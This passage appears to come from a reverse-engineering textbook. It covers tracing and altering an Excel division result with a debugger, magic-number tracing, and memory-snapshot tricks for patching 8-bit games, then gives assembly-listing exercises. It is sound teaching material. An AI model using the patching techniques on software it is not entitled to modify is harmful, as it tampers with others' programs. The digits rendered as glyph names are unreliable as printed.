FLAGS=PF IF
FPU ControlWord=IC RC=NEAR PC=64bits PM UM OM ZM DM IM
FPU StatusWord=
FPU ST(0): 1.000000
ST(0) holding first argument (/one.pnum) and second one is in [ebx] .
Next instruction a/f_ter FDIV writes result into memory:
.text:3011E91B DD 1E fstp qword ptr [esi]
/one.pnum/seven.pnum/zero.pnum
If to set breakpoint on it, we may see result:
PID=32852|TID=36488|(0) 0x2f40e91b (Excel.exe!BASE+0x11e91b)
EAX=0x00598006 EBX=0x00598018 ECX=0x00000001 EDX=0x00000001
ESI=0x00598000 EDI=0x00294804 EBP=0x026CF93C ESP=0x026CF8F8
EIP=0x2F40E91B
FLAGS=PF IF
FPU ControlWord=IC RC=NEAR PC=64bits PM UM OM ZM DM IM
FPU StatusWord=C1 P
FPU ST(0): 0.333333
Also, as a practical joke, we can modify it on-fly:
tracer -l:excel.exe bpx=excel.exe!BASE+0x11E91B,set(st0,666)
PID=36540|TID=24056|(0) 0x2f40e91b (Excel.exe!BASE+0x11e91b)
EAX=0x00680006 EBX=0x00680018 ECX=0x00000001 EDX=0x00000001
ESI=0x00680000 EDI=0x00395404 EBP=0x0290FD9C ESP=0x0290FD58
EIP=0x2F40E91B
FLAGS=PF IF
FPU ControlWord=IC RC=NEAR PC=64bits PM UM OM ZM DM IM
FPU StatusWord=C1 P
FPU ST(0): 0.333333
Set ST0 register to 666.000000
Excel showing 666in that cell what finally convincing us we find the right place.
Figure /three.pnum./one.pnum: Practical joke worked
If to try the same Excel version, but x/six.pnum/four.pnum, we’ll see there are only /one.pnum/two.pnum FDIV instructions, and the one we looking
for — third.
tracer.exe -l:excel.exe bpx=excel.exe!BASE+0x1B7FCC,set(st0,666)
It seems, a lot of division operations of float and double types, compiler replaced by SSE-instructions like DIVSD
(DIVSD present here /two.pnum/six.pnum/eight.pnum in total).
/three.pnum./five.pnum Suspicious code patterns
Modern compilers do not emit LOOP andRCLinstructions. On the other hand, these instructions are well-known
to coders who like to code in straight assembly language. If you spot these, it can be said, with a high probability,
this fragment of code is hand-written. Also, function prologue/epilogue is not usually present in hand-written
assembly copy.
/one.pnum/seven.pnum/one.pnum
/three.pnum./six.pnum Magic numbers usage while tracing
O/f_ten, main goal is to get to know, how some value was read from file, or received via network, being used. O/f_ten,
manual tracing of some value is very labouring task. One of the simple methods (however, not /one.pnum/zero.pnum/zero.pnum% reliable) is to
use your own magic number .
This resembling X-ray computed tomography is some sense: radiocontrast agent is o/f_ten injected into patient’s
blood, which is used for improving visibility of internal structures in X-rays. For example, it’s well known how blood
of healthy man/woman percolates in kidneys and if agent is in blood, it will be easily seen on tomography, how
good and normal blood was percolating, are there any stones or tumors.
We can take some /three.pnum/two.pnum-bit number like /zero.pnumx/zero.pnumbadf/zero.pnum/zero.pnumd , or someone birth date like /zero.pnumx/one.pnum/one.pnum/one.pnum/zero.pnum/one.pnum/nine.pnum/seven.pnum/nine.pnum and to write this, /four.pnum
byte holding number, to some place in file used by the program we investigate.
Then, while tracing this program, with tracer /five.pnum./zero.pnum./one.pnum in code coverage mode, and then, with help if grep or just by
searching in the text file (of tracing results), we can easily see, where the value was used and how.
Example of grepable tracer /five.pnum./zero.pnum./one.pnum results in ccmode:
0x150bf66 (_kziaia+0x14), e= 1 [MOV EBX, [EBP+8]] [EBP+8]=0xf59c934
0x150bf69 (_kziaia+0x17), e= 1 [MOV EDX, [69AEB08h]] [69AEB08h]=0
0x150bf6f (_kziaia+0x1d), e= 1 [FS: MOV EAX, [2Ch]]
0x150bf75 (_kziaia+0x23), e= 1 [MOV ECX, [EAX+EDX*4]] [EAX+EDX*4]=0xf1ac360
0x150bf78 (_kziaia+0x26), e= 1 [MOV [EBP-4], ECX] ECX=0xf1ac360
This can be used for network packets as well. It’s important to be unique for magic number and not to be
present in the program’s code.
Aside of tracer /five.pnum./zero.pnum./one.pnum, DosBox (MS-DOS emulator) in heavydebug mode, can write information about all register’s
states for each executed instruction of program to plain text file/seven.pnum, so this method may be useful for DOS programs
as well.
/three.pnum./seven.pnum Old-school methods, nevertheless, interesting to know
/three.pnum./seven.pnum./one.pnum Memory “snapshots” comparing
The method of simple two memory snapshots comparing in order to see changes, was o/f_ten used to hack /eight.pnum-bit
computer games and hacking “high score” files.
For example, if you got some loaded game on /eight.pnum-bit computer (it’s not much memory on these, but game is usu-
ally consumes even less memory) and you know that you have now, let’s say, /one.pnum/zero.pnum/zero.pnum bullets, you can do a “snapshot”
of all memory and save it to some place. Then shoot somewhere, bullet count now /nine.pnum/nine.pnum, do second “snapshot” and
then compare both: somewhere should be a byte which was /one.pnum/zero.pnum/zero.pnum in the beginning and now it’s /nine.pnum/nine.pnum. Considering a
fact that these /eight.pnum-bit games were o/f_ten written in assembly language and such variables were global, it can be said
for sure, which address in memory holding bullets count. If to search all references to that address in disassem-
bled game code, it’s not very hard to find a piece of code decrementing bullets count, write NOPinstruction/eight.pnumthere,
or couple of NOP-s, we’ll have a game with /one.pnum/zero.pnum/zero.pnum (for example) bullets forever. Games on these /eight.pnum-bit computers was
usually loaded on the same address, also, there were no much different versions of each game (usually, just one
version is popular), enthusiastic gamers knew, which byte should be written (using BASIC instruction POKE/nine.pnum) to
which address in order to hack it. This led to “cheat” lists containing of POKE instructions published in magazines
related to /eight.pnum-bit games. See also: http://en.wikipedia.org/wiki/PEEK_and_POKE .
The same story about modifying “high score” files, this may work not only with /eight.pnum-bit games. Let’s notice your
score count and save the file somewhere. When “high score” count will be different, just compare two files, it can
be even done with DOS-utility FC/one.pnum/zero.pnum(“high score” files are o/f_ten in binary form). There will be some place where
couple of bytes will be different and it will be easy to see which ones are holding score number. However, game
developers are aware of such tricks and may protect against it.
/seven.pnumSee also my blog post about this DosBox feature: http://blog.yurichev.com/node/55
/eight.pnum“no operation” , idle operation
/nine.pnumBASIC language instruction writting byte on specific address
/one.pnum/zero.pnumMS-DOS utility for binary files comparing
/one.pnum/seven.pnum/two.pnum
Chapter /four.pnum
Tasks
There are two questions almost for every task, if otherwise isn’t specified:
/one.pnum) What this function does? Answer in one-sentence form.
/two.pnum) Rewrite this function into C/C++.
Hints and solutions are in the appendix of this book.
/four.pnum./one.pnum Easy level
/four.pnum./one.pnum./one.pnum Task /one.pnum./one.pnum
This is standard C library function. Source code taken from OpenWatcom. Compiled in MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum.
_TEXT SEGMENT
_input$ = 8 ; size = 1
_f PROC
push ebp
mov ebp, esp
movsx eax, BYTE PTR _input$[ebp]
cmp eax, 97 ; 00000061H
jl SHORT $LN1@f
movsx ecx, BYTE PTR _input$[ebp]
cmp ecx, 122 ; 0000007aH
jg SHORT $LN1@f
movsx edx, BYTE PTR _input$[ebp]
sub edx, 32 ; 00000020H
mov BYTE PTR _input$[ebp], dl
$LN1@f:
mov al, BYTE PTR _input$[ebp]
pop ebp
ret 0
_f ENDP
_TEXT ENDS
It is the same code compiled by GCC /four.pnum./four.pnum./one.pnum with -O3option (maximum optimization):
_f proc near
input = dword ptr 8
push ebp
mov ebp, esp
movzx eax, byte ptr [ebp+input]
lea edx, [eax-61h]
cmp dl, 19h
ja short loc_80483F2
sub eax, 20h
loc_80483F2:
pop ebp
/one.pnum/seven.pnum/three.pnum
retn
_f endp
/four.pnum./one.pnum./two.pnum Task /one.pnum./two.pnum
This is also standard C library function. Source code is taken from OpenWatcom and modified slightly. Compiled
in MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum with /Oxoptimization flag.
This function also use these standard C functions: isspace() and isdigit().
EXTRN _isdigit:PROC
EXTRN _isspace:PROC
EXTRN ___ptr_check:PROC
; Function compile flags: /Ogtpy
_TEXT SEGMENT
_p$ = 8 ; size = 4
_f PROC
push ebx
push esi
mov esi, DWORD PTR _p$[esp+4]
push edi
push 0
push esi
call ___ptr_check
mov eax, DWORD PTR [esi]
push eax
call _isspace
add esp, 12 ; 0000000cH
test eax, eax
je SHORT $LN6@f
npad 2
$LL7@f:
mov ecx, DWORD PTR [esi+4]
add esi, 4
push ecx
call _isspace
add esp, 4
test eax, eax
jne SHORT $LL7@f
$LN6@f:
mov bl, BYTE PTR [esi]
cmp bl, 43 ; 0000002bH
je SHORT $LN4@f
cmp bl, 45 ; 0000002dH
jne SHORT $LN5@f
$LN4@f:
add esi, 4
$LN5@f:
mov edx, DWORD PTR [esi]
push edx
xor edi, edi
call _isdigit
add esp, 4
test eax, eax
je SHORT $LN2@f
$LL3@f:
mov ecx, DWORD PTR [esi]
mov edx, DWORD PTR [esi+4]
add esi, 4
lea eax, DWORD PTR [edi+edi*4]
push edx
lea edi, DWORD PTR [ecx+eax*2-48]
call _isdigit
add esp, 4
test eax, eax
jne SHORT $LL3@f
/one.pnum/seven.pnum/four.pnum
$LN2@f:
cmp bl, 45 ; 0000002dH
jne SHORT $LN14@f
neg edi
$LN14@f:
mov eax, edi
pop edi
pop esi
pop ebx
ret 0
_f ENDP
_TEXT ENDS
Same code compiled in GCC /four.pnum./four.pnum./one.pnum. This task is sligthly harder because GCC compiled isspace() and isdigit()
functions like inline-functions and inserted their bodies right into code.
_f proc near
var_10 = dword ptr -10h
var_9 = byte ptr -9
input = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
jmp short loc_8048410
loc_804840C:
add [ebp+input], 4
loc_8048410:
call ___ctype_b_loc
mov edx, [eax]
mov eax, [ebp+input]
mov eax, [eax]
add eax, eax
lea eax, [edx+eax]
movzx eax, word ptr [eax]
movzx eax, ax
and eax, 2000h
test eax, eax
jnz short loc_804840C
mov eax, [ebp+input]
mov eax, [eax]
mov [ebp+var_9], al
cmp [ebp+var_9], ’+’
jz short loc_8048444
cmp [ebp+var_9], ’-’
jnz short loc_8048448
loc_8048444:
add [ebp+input], 4
loc_8048448:
mov [ebp+var_10], 0
jmp short loc_8048471
loc_8048451:
mov edx, [ebp+var_10]
mov eax, edx
shl eax, 2
add eax, edx
add eax, eax
mov edx, eax
mov eax, [ebp+input]
mov eax, [eax]
lea eax, [edx+eax]
/one.pnum/seven.pnum/five.pnum
sub eax, 30h
mov [ebp+var_10], eax
add [ebp+input], 4
loc_8048471:
call ___ctype_b_loc
mov edx, [eax]
mov eax, [ebp+input]
mov eax, [eax]
add eax, eax
lea eax, [edx+eax]
movzx eax, word ptr [eax]
movzx eax, ax
and eax, 800h
test eax, eax
jnz short loc_8048451
cmp [ebp+var_9], 2Dh
jnz short loc_804849A
neg [ebp+var_10]
loc_804849A:
mov eax, [ebp+var_10]
leave
retn
_f endp
/four.pnum./one.pnum./three.pnum Task /one.pnum./three.pnum
This is standard C function too, actually, two functions working in pair. Source code taken from MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum and
modified sligthly.
The matter of modification is that this function can work properly in multi-threaded environment, and I re-
moved its support for simplification (or for confusion).
Compiled in MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum with /Oxflag.
_BSS SEGMENT
_v DD 01H DUP (?)
_BSS ENDS
_TEXT SEGMENT
_s$ = 8 ; size = 4
f1 PROC
push ebp
mov ebp, esp
mov eax, DWORD PTR _s$[ebp]
mov DWORD PTR _v, eax
pop ebp
ret 0
f1 ENDP
_TEXT ENDS
PUBLIC f2
_TEXT SEGMENT
f2 PROC
push ebp
mov ebp, esp
mov eax, DWORD PTR _v
imul eax, 214013 ; 000343fdH
add eax, 2531011 ; 00269ec3H
mov DWORD PTR _v, eax
mov eax, DWORD PTR _v
shr eax, 16 ; 00000010H
and eax, 32767 ; 00007fffH
pop ebp
ret 0
/one.pnum/seven.pnum/six.pnum
f2 ENDP
_TEXT ENDS
END
Same code compiled in GCC /four.pnum./four.pnum./one.pnum:
public f1
f1 proc near
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov ds:v, eax
pop ebp
retn
f1 endp
public f2
f2 proc near
push ebp
mov ebp, esp
mov eax, ds:v
imul eax, 343FDh
add eax, 269EC3h
mov ds:v, eax
mov eax, ds:v
shr eax, 10h
and eax, 7FFFh
pop ebp
retn
f2 endp
bss segment dword public ’BSS’ use32
assume cs:_bss
dd ?
bss ends
/four.pnum./one.pnum./four.pnum Task /one.pnum./four.pnum
This is standard C library function. Source code taken from MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum. Compiled in MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum with /Oxflag.
PUBLIC _f
_TEXT SEGMENT
_arg1$ = 8 ; size = 4
_arg2$ = 12 ; size = 4
_f PROC
push esi
mov esi, DWORD PTR _arg1$[esp]
push edi
mov edi, DWORD PTR _arg2$[esp+4]
cmp BYTE PTR [edi], 0
mov eax, esi
je SHORT $LN7@f
mov dl, BYTE PTR [esi]
push ebx
test dl, dl
je SHORT $LN4@f
sub esi, edi
npad 6
$LL5@f:
mov ecx, edi
test dl, dl
je SHORT $LN2@f
/one.pnum/seven.pnum/seven.pnum
$LL3@f:
mov dl, BYTE PTR [ecx]
test dl, dl
je SHORT $LN14@f
movsx ebx, BYTE PTR [esi+ecx]
movsx edx, dl
sub ebx, edx
jne SHORT $LN2@f
inc ecx
cmp BYTE PTR [esi+ecx], bl
jne SHORT $LL3@f
$LN2@f:
cmp BYTE PTR [ecx], 0
je SHORT $LN14@f
mov dl, BYTE PTR [eax+1]
inc eax
inc esi
test dl, dl
jne SHORT $LL5@f
xor eax, eax
pop ebx
pop edi
pop esi
ret 0
_f ENDP
_TEXT ENDS
END
Same code compiled in GCC /four.pnum./four.pnum./one.pnum:
public f
f proc near
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
movzx eax, byte ptr [eax]
test al, al
jnz short loc_8048443
mov eax, [ebp+arg_0]
jmp short locret_8048453
loc_80483F4:
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov [ebp+var_C], eax
jmp short loc_804840A
loc_8048402:
add [ebp+var_8], 1
add [ebp+var_C], 1
loc_804840A:
mov eax, [ebp+var_8]
movzx eax, byte ptr [eax]
test al, al
jz short loc_804842E
/one.pnum/seven.pnum/eight.pnum
mov eax, [ebp+var_C]
movzx eax, byte ptr [eax]
test al, al
jz short loc_804842E
mov eax, [ebp+var_8]
movzx edx, byte ptr [eax]
mov eax, [ebp+var_C]
movzx eax, byte ptr [eax]
cmp dl, al
jz short loc_8048402
loc_804842E:
mov eax, [ebp+var_C]
movzx eax, byte ptr [eax]
test al, al
jnz short loc_804843D
mov eax, [ebp+var_4]
jmp short locret_8048453
loc_804843D:
add [ebp+var_4], 1
jmp short loc_8048444
loc_8048443:
nop
loc_8048444:
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
test al, al
jnz short loc_80483F4
mov eax, 0
locret_8048453:
leave
retn
f endp
/four.pnum./one.pnum./five.pnum Task /one.pnum./five.pnum
This task is rather on knowledge than on reading code.
The function is taken from OpenWatcom. Compiled in MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum with /Oxflag.
_DATA SEGMENT
COMM __v:DWORD
_DATA ENDS
PUBLIC __real@3e45798ee2308c3a
PUBLIC __real@4147ffff80000000
PUBLIC __real@4150017ec0000000
PUBLIC _f
EXTRN __fltused:DWORD
CONST SEGMENT
__real@3e45798ee2308c3a DQ 03e45798ee2308c3ar ; 1e-008
__real@4147ffff80000000 DQ 04147ffff80000000r ; 3.14573e+006
__real@4150017ec0000000 DQ 04150017ec0000000r ; 4.19584e+006
CONST ENDS
_TEXT SEGMENT
_v1$ = -16 ; size = 8
_v2$ = -8 ; size = 8
_f PROC
sub esp, 16 ; 00000010H
fld QWORD PTR __real@4150017ec0000000
fstp QWORD PTR _v1$[esp+16]
fld QWORD PTR __real@4147ffff80000000
/one.pnum/seven.pnum/nine.pnum
fstp QWORD PTR _v2$[esp+16]
fld QWORD PTR _v1$[esp+16]
fld QWORD PTR _v1$[esp+16]
fdiv QWORD PTR _v2$[esp+16]
fmul QWORD PTR _v2$[esp+16]
fsubp ST(1), ST(0)
fcomp QWORD PTR __real@3e45798ee2308c3a
fnstsw ax
test ah, 65 ; 00000041H
jne SHORT $LN1@f
or DWORD PTR __v, 1
$LN1@f:
add esp, 16 ; 00000010H
ret 0
_f ENDP
_TEXT ENDS
/four.pnum./one.pnum./six.pnum Task /one.pnum./six.pnum
Compiled in MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum with /Oxoption.
PUBLIC _f
; Function compile flags: /Ogtpy
_TEXT SEGMENT
_k0$ = -12 ; size = 4
_k3$ = -8 ; size = 4
_k2$ = -4 ; size = 4
_v$ = 8 ; size = 4
_k1$ = 12 ; size = 4
_k$ = 12 ; size = 4
_f PROC
sub esp, 12 ; 0000000cH
mov ecx, DWORD PTR _v$[esp+8]
mov eax, DWORD PTR [ecx]
mov ecx, DWORD PTR [ecx+4]
push ebx
push esi
mov esi, DWORD PTR _k$[esp+16]
push edi
mov edi, DWORD PTR [esi]
mov DWORD PTR _k0$[esp+24], edi
mov edi, DWORD PTR [esi+4]
mov DWORD PTR _k1$[esp+20], edi
mov edi, DWORD PTR [esi+8]
mov esi, DWORD PTR [esi+12]
xor edx, edx
mov DWORD PTR _k2$[esp+24], edi
mov DWORD PTR _k3$[esp+24], esi
lea edi, DWORD PTR [edx+32]
$LL8@f:
mov esi, ecx
shr esi, 5
add esi, DWORD PTR _k1$[esp+20]
mov ebx, ecx
shl ebx, 4
add ebx, DWORD PTR _k0$[esp+24]
sub edx, 1640531527 ; 61c88647H
xor esi, ebx
lea ebx, DWORD PTR [edx+ecx]
xor esi, ebx
add eax, esi
mov esi, eax
shr esi, 5
add esi, DWORD PTR _k3$[esp+24]
mov ebx, eax
/one.pnum/eight.pnum/zero.pnum
shl ebx, 4
add ebx, DWORD PTR _k2$[esp+24]
xor esi, ebx
lea ebx, DWORD PTR [edx+eax]
xor esi, ebx
add ecx, esi
dec edi
jne SHORT $LL8@f
mov edx, DWORD PTR _v$[esp+20]
pop edi
pop esi
mov DWORD PTR [edx], eax
mov DWORD PTR [edx+4], ecx
pop ebx
add esp, 12 ; 0000000cH
ret 0
_f ENDP
/four.pnum./one.pnum./seven.pnum Task /one.pnum./seven.pnum
This function is taken from Linux /two.pnum./six.pnum kernel.
Compiled in MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum with /Oxoption:
_table db 000h, 080h, 040h, 0c0h, 020h, 0a0h, 060h, 0e0h
db 010h, 090h, 050h, 0d0h, 030h, 0b0h, 070h, 0f0h
db 008h, 088h, 048h, 0c8h, 028h, 0a8h, 068h, 0e8h
db 018h, 098h, 058h, 0d8h, 038h, 0b8h, 078h, 0f8h
db 004h, 084h, 044h, 0c4h, 024h, 0a4h, 064h, 0e4h
db 014h, 094h, 054h, 0d4h, 034h, 0b4h, 074h, 0f4h
db 00ch, 08ch, 04ch, 0cch, 02ch, 0ach, 06ch, 0ech
db 01ch, 09ch, 05ch, 0dch, 03ch, 0bch, 07ch, 0fch
db 002h, 082h, 042h, 0c2h, 022h, 0a2h, 062h, 0e2h
db 012h, 092h, 052h, 0d2h, 032h, 0b2h, 072h, 0f2h
db 00ah, 08ah, 04ah, 0cah, 02ah, 0aah, 06ah, 0eah
db 01ah, 09ah, 05ah, 0dah, 03ah, 0bah, 07ah, 0fah
db 006h, 086h, 046h, 0c6h, 026h, 0a6h, 066h, 0e6h
db 016h, 096h, 056h, 0d6h, 036h, 0b6h, 076h, 0f6h
db 00eh, 08eh, 04eh, 0ceh, 02eh, 0aeh, 06eh, 0eeh
db 01eh, 09eh, 05eh, 0deh, 03eh, 0beh, 07eh, 0feh
db 001h, 081h, 041h, 0c1h, 021h, 0a1h, 061h, 0e1h
db 011h, 091h, 051h, 0d1h, 031h, 0b1h, 071h, 0f1h
db 009h, 089h, 049h, 0c9h, 029h, 0a9h, 069h, 0e9h
db 019h, 099h, 059h, 0d9h, 039h, 0b9h, 079h, 0f9h
db 005h, 085h, 045h, 0c5h, 025h, 0a5h, 065h, 0e5h
db 015h, 095h, 055h, 0d5h, 035h, 0b5h, 075h, 0f5h
db 00dh, 08dh, 04dh, 0cdh, 02dh, 0adh, 06dh, 0edh
db 01dh, 09dh, 05dh, 0ddh, 03dh, 0bdh, 07dh, 0fdh
db 003h, 083h, 043h, 0c3h, 023h, 0a3h, 063h, 0e3h
db 013h, 093h, 053h, 0d3h, 033h, 0b3h, 073h, 0f3h
db 00bh, 08bh, 04bh, 0cbh, 02bh, 0abh, 06bh, 0ebh
db 01bh, 09bh, 05bh, 0dbh, 03bh, 0bbh, 07bh, 0fbh
db 007h, 087h, 047h, 0c7h, 027h, 0a7h, 067h, 0e7h
db 017h, 097h, 057h, 0d7h, 037h, 0b7h, 077h, 0f7h
db 00fh, 08fh, 04fh, 0cfh, 02fh, 0afh, 06fh, 0efh
db 01fh, 09fh, 05fh, 0dfh, 03fh, 0bfh, 07fh, 0ffh
f proc near
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
movzx eax, dl
movzx eax, _table[eax]
mov ecx, edx
shr edx, 8
/one.pnum/eight.pnum/one.pnum
movzx edx, dl
movzx edx, _table[edx]
shl ax, 8
movzx eax, ax
or eax, edx
shr ecx, 10h
movzx edx, cl
movzx edx, _table[edx]
shr ecx, 8
movzx ecx, cl
movzx ecx, _table[ecx]
shl dx, 8
movzx edx, dx
shl eax, 10h
or edx, ecx
or eax, edx
retn
f endp
/four.pnum./one.pnum./eight.pnum Task /one.pnum./eight.pnum
Compiled in MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum with /O1option/one.pnum:
_a$ = 8 ; size = 4
_b$ = 12 ; size = 4
_c$ = 16 ; size = 4
?s@@YAXPAN00@Z PROC ; s, COMDAT
mov eax, DWORD PTR _b$[esp-4]
mov ecx, DWORD PTR _a$[esp-4]
mov edx, DWORD PTR _c$[esp-4]
push esi
push edi
sub ecx, eax
sub edx, eax
mov edi, 200 ; 000000c8H
$LL6@s:
push 100 ; 00000064H
pop esi
$LL3@s:
fld QWORD PTR [ecx+eax]
fadd QWORD PTR [eax]
fstp QWORD PTR [edx+eax]
add eax, 8
dec esi
jne SHORT $LL3@s
dec edi
jne SHORT $LL6@s
pop edi
pop esi
ret 0
?s@@YAXPAN00@Z ENDP ; s
/four.pnum./one.pnum./nine.pnum Task /one.pnum./nine.pnum
Compiled in MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum with /O1option:
tv315 = -8 ; size = 4
tv291 = -4 ; size = 4
_a$ = 8 ; size = 4
_b$ = 12 ; size = 4
_c$ = 16 ; size = 4
?m@@YAXPAN00@Z PROC ; m, COMDAT
/one.pnum/O/one.pnum: minimize space
/one.pnum/eight.pnum/two.pnum
push ebp
mov ebp, esp
push ecx
push ecx
mov edx, DWORD PTR _a$[ebp]
push ebx
mov ebx, DWORD PTR _c$[ebp]
push esi
mov esi, DWORD PTR _b$[ebp]
sub edx, esi
push edi
sub esi, ebx
mov DWORD PTR tv315[ebp], 100 ; 00000064H
$LL9@m:
mov eax, ebx
mov DWORD PTR tv291[ebp], 300 ; 0000012cH
$LL6@m:
fldz
lea ecx, DWORD PTR [esi+eax]
fstp QWORD PTR [eax]
mov edi, 200 ; 000000c8H
$LL3@m:
dec edi
fld QWORD PTR [ecx+edx]
fmul QWORD PTR [ecx]
fadd QWORD PTR [eax]
fstp QWORD PTR [eax]
jne HORT $LL3@m
add eax, 8
dec DWORD PTR tv291[ebp]
jne SHORT $LL6@m
add ebx, 800 ; 00000320H
dec DWORD PTR tv315[ebp]
jne SHORT $LL9@m
pop edi
pop esi
pop ebx
leave
ret 0
?m@@YAXPAN00@Z ENDP ; m
/four.pnum./one.pnum./one.pnum/zero.pnum Task /one.pnum./one.pnum/zero.pnum
If to compile this piece of code and run, some number will be printed. Where it came from? Where it came from if
to compile it in MSVC with optimization ( /Ox)?
#include <stdio.h>
int main()
{
printf ("%d\n");
return 0;
};
/four.pnum./two.pnum Middle level
/four.pnum./two.pnum./one.pnum Task /two.pnum./one.pnum
Well-known algorithm, also included in standard C library. Source code was taken from glibc /two.pnum./one.pnum/one.pnum./one.pnum. Compiled in
GCC /four.pnum./four.pnum./one.pnum with -Osoption (code size optimization). Listing was done by IDA /four.pnum./nine.pnum disassembler from ELF-file gener-
ated by GCC and linker.
/one.pnum/eight.pnum/three.pnum
For those who wants use IDA while learning, here you may find .elf and .idb files, .idb can be opened with
freeware IDA /four.pnum./nine.pnum:
http://conus.info/RE-tasks/middle/1/
f proc near
var_150 = dword ptr -150h
var_14C = dword ptr -14Ch
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push edi
push esi
push ebx
sub esp, 14Ch
mov ebx, [ebp+arg_8]
cmp [ebp+arg_4], 0
jz loc_804877D
cmp [ebp+arg_4], 4
lea eax, ds:0[ebx*4]
mov [ebp+var_130], eax
jbe loc_804864C
mov eax, [ebp+arg_4]
mov ecx, ebx
mov esi, [ebp+arg_0]
lea edx, [ebp+var_110]
neg ecx
mov [ebp+var_118], 0
mov [ebp+var_114], 0
dec eax
imul eax, ebx
add eax, [ebp+arg_0]
mov [ebp+var_11C], edx
mov [ebp+var_134], ecx
mov [ebp+var_124], eax
lea eax, [ebp+var_118]
mov [ebp+var_14C], eax
mov [ebp+var_120], ebx
loc_8048433: ; CODE XREF: f+28C
mov eax, [ebp+var_124]
xor edx, edx
push edi
push [ebp+arg_10]
sub eax, esi
div [ebp+var_120]
push esi
shr eax, 1
imul eax, [ebp+var_120]
/one.pnum/eight.pnum/four.pnum
lea edx, [esi+eax]
push edx
mov [ebp+var_138], edx
call [ebp+arg_C]
add esp, 10h
mov edx, [ebp+var_138]
test eax, eax
jns short loc_8048482
xor eax, eax
loc_804846D: ; CODE XREF: f+CC
mov cl, [edx+eax]
mov bl, [esi+eax]
mov [edx+eax], bl
mov [esi+eax], cl
inc eax
cmp [ebp+var_120], eax
jnz short loc_804846D
loc_8048482: ; CODE XREF: f+B5
push ebx
push [ebp+arg_10]
mov [ebp+var_138], edx
push edx
push [ebp+var_124]
call [ebp+arg_C]
mov edx, [ebp+var_138]
add esp, 10h
test eax, eax
jns short loc_80484F6
mov ecx, [ebp+var_124]
xor eax, eax
loc_80484AB: ; CODE XREF: f+10D
movzx edi, byte ptr [edx+eax]
mov bl, [ecx+eax]
mov [edx+eax], bl
mov ebx, edi
mov [ecx+eax], bl
inc eax
cmp [ebp+var_120], eax
jnz short loc_80484AB
push ecx
push [ebp+arg_10]
mov [ebp+var_138], edx
push esi
push edx
call [ebp+arg_C]
add esp, 10h
mov edx, [ebp+var_138]
test eax, eax
jns short loc_80484F6
xor eax, eax
loc_80484E1: ; CODE XREF: f+140
mov cl, [edx+eax]
mov bl, [esi+eax]
mov [edx+eax], bl
mov [esi+eax], cl
inc eax
cmp [ebp+var_120], eax
jnz short loc_80484E1
loc_80484F6: ; CODE XREF: f+ED
; f+129
mov eax, [ebp+var_120]
/one.pnum/eight.pnum/five.pnum
mov edi, [ebp+var_124]
add edi, [ebp+var_134]
lea ebx, [esi+eax]
jmp short loc_8048513
; ---------------------------------------------------------------------------
loc_804850D: ; CODE XREF: f+17B
add ebx, [ebp+var_120]
loc_8048513: ; CODE XREF: f+157
; f+1F9
push eax
push [ebp+arg_10]
mov [ebp+var_138], edx
push edx
push ebx
call [ebp+arg_C]
add esp, 10h
mov edx, [ebp+var_138]
test eax, eax
jns short loc_8048537
jmp short loc_804850D
; ---------------------------------------------------------------------------
loc_8048531: ; CODE XREF: f+19D
add edi, [ebp+var_134]
loc_8048537: ; CODE XREF: f+179
push ecx
push [ebp+arg_10]
mov [ebp+var_138], edx
push edi
push edx
call [ebp+arg_C]
add esp, 10h
mov edx, [ebp+var_138]
test eax, eax
js short loc_8048531
cmp ebx, edi
jnb short loc_8048596
xor eax, eax
mov [ebp+var_128], edx
loc_804855F: ; CODE XREF: f+1BE
mov cl, [ebx+eax]
mov dl, [edi+eax]
mov [ebx+eax], dl
mov [edi+eax], cl
inc eax
cmp [ebp+var_120], eax
jnz short loc_804855F
mov edx, [ebp+var_128]
cmp edx, ebx
jnz short loc_8048582
mov edx, edi
jmp short loc_8048588
; ---------------------------------------------------------------------------
loc_8048582: ; CODE XREF: f+1C8
cmp edx, edi
jnz short loc_8048588
mov edx, ebx
loc_8048588: ; CODE XREF: f+1CC
; f+1D0
add ebx, [ebp+var_120]
/one.pnum/eight.pnum/six.pnum
add edi, [ebp+var_134]
jmp short loc_80485AB
; ---------------------------------------------------------------------------
loc_8048596: ; CODE XREF: f+1A1
jnz short loc_80485AB
mov ecx, [ebp+var_134]
mov eax, [ebp+var_120]
lea edi, [ebx+ecx]
add ebx, eax
jmp short loc_80485B3
; ---------------------------------------------------------------------------
loc_80485AB: ; CODE XREF: f+1E0
; f:loc_8048596
cmp ebx, edi
jbe loc_8048513
loc_80485B3: ; CODE XREF: f+1F5
mov eax, edi
sub eax, esi
cmp eax, [ebp+var_130]
ja short loc_80485EB
mov eax, [ebp+var_124]
mov esi, ebx
sub eax, ebx
cmp eax, [ebp+var_130]
ja short loc_8048634
sub [ebp+var_11C], 8
mov edx, [ebp+var_11C]
mov ecx, [edx+4]
mov esi, [edx]
mov [ebp+var_124], ecx
jmp short loc_8048634
